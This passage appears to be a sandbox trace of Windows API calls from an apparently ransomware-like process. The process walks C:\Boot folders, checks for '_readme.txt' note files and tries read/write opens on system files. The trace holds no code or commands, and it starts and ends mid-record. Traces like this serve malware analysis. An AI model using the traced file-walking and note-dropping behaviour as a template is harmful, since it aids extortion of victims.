returned 1 [0130.003] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.003] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0130.003] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.003] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.003] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.003] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0130.003] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.003] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.003] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.003] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0130.003] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.003] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.003] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.004] PathFindFileNameW (pszPath="C:\\Boot\\it-IT\\") returned="it-IT\\" [0130.004] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9d90 [0130.004] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.004] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0130.004] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9d90 | out: hHeap=0x4970000) returned 1 [0130.004] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0130.004] PathFindFileNameW (pszPath="") returned="" [0130.004] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9d90 [0130.004] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0130.005] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0130.005] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x800) returned 0x7516fe8 [0130.005] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x7516fe8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0130.005] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x810) returned 0xdcd2b08 [0130.005] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.005] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.005] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.005] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9d90 | out: hHeap=0x4970000) returned 1 [0130.005] FreeLibrary (hLibModule=0x759d0000) returned 1 [0130.005] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.005] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0130.005] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.005] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.005] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x81c) returned 0xdcd2b08 [0130.005] PathAppendW (in: pszPath="C:\\Boot\\it-IT\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\it-IT\\_readme.txt") returned 1 [0130.005] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.005] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.005] PathFileExistsW (pszPath="C:\\Boot\\it-IT\\_readme.txt") returned 1 [0130.006] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.006] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.006] FindFirstFileW (in: lpFileName="C:\\Boot\\it-IT\\*", lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xe386c600, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe386c600, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x49a4880 [0130.006] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.006] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xe386c600, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe386c600, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0130.006] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e80ea3, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0130.006] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.006] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdcf2d28 [0130.006] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.006] PathFindExtensionW (pszPath="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned=".mui" [0130.006] CreateFileW (lpFileName="C:\\Boot\\it-IT\\bootmgr.exe.mui" (normalized: "c:\\boot\\it-it\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0130.006] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf2d28 | out: hHeap=0x4970000) returned 1 [0130.006] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe386c600, ftCreationTime.dwHighDateTime=0x1d6d58a, ftLastAccessTime.dwLowDateTime=0xe386c600, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe386c600, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0130.007] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.007] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdcf2d28 [0130.007] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.007] PathFindExtensionW (pszPath="C:\\Boot\\it-IT\\_readme.txt") returned=".txt" [0130.007] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf2d28 | out: hHeap=0x4970000) returned 1 [0130.007] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe386c600, ftCreationTime.dwHighDateTime=0x1d6d58a, ftLastAccessTime.dwLowDateTime=0xe386c600, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe386c600, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0130.007] FindClose (in: hFindFile=0x49a4880 | out: hFindFile=0x49a4880) returned 1 [0130.007] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.007] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce97a0 | out: hHeap=0x4970000) returned 1 [0130.007] PeekMessageW (in: lpMsg=0xe00ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00ff08) returned 0 [0130.007] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce97a0 [0130.007] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0130.007] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.007] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.007] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.007] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.007] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.007] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0130.007] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.007] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.007] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.007] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0130.007] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.007] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.008] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.008] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0130.008] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.008] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.008] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.008] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0130.008] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.008] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.008] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.008] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0130.008] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.008] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.008] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.008] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.008] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc2e) returned 0x7516fe8 [0130.008] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.008] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0130.008] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.008] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.008] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.008] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.008] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.008] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.008] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0130.008] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.008] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.008] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.008] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0130.008] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0130.009] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.009] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.009] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0130.009] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0130.009] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.009] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.009] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.009] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.009] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.009] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.009] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.009] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.009] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.009] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.009] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0130.009] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.009] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.009] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.009] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0130.009] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.009] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.009] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.009] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0130.009] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.009] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.009] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.009] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0130.009] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.010] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.010] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.010] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0130.010] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.010] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.010] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.010] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.010] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.010] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.010] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.010] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.010] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.010] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.010] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.010] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.010] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.010] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.010] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.010] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0130.010] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.010] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.010] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.010] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0130.010] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0130.010] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.010] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0130.010] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.010] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.010] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.011] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.011] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.011] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.011] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.011] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc2e) returned 0x7516fe8 [0130.011] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.011] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0130.011] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.011] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.011] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0130.011] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0130.011] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.011] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.011] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0130.011] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0130.011] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.011] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.011] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.011] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.011] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.011] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.011] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.011] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.011] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.011] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.011] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0130.011] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0130.011] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.012] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0130.012] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.012] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.012] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0130.012] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.012] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.012] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.012] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0130.012] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.012] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.012] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.012] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0130.012] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.012] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.012] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.012] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0130.012] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.012] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.012] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.012] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0130.012] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.012] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.012] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.012] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.012] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.012] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.013] PathFindFileNameW (pszPath="C:\\Boot\\ja-JP\\") returned="ja-JP\\" [0130.013] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0130.013] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.013] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0130.013] PathFindFileNameW (pszPath="") returned="" [0130.013] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0130.014] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0130.014] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x7516fe8 | 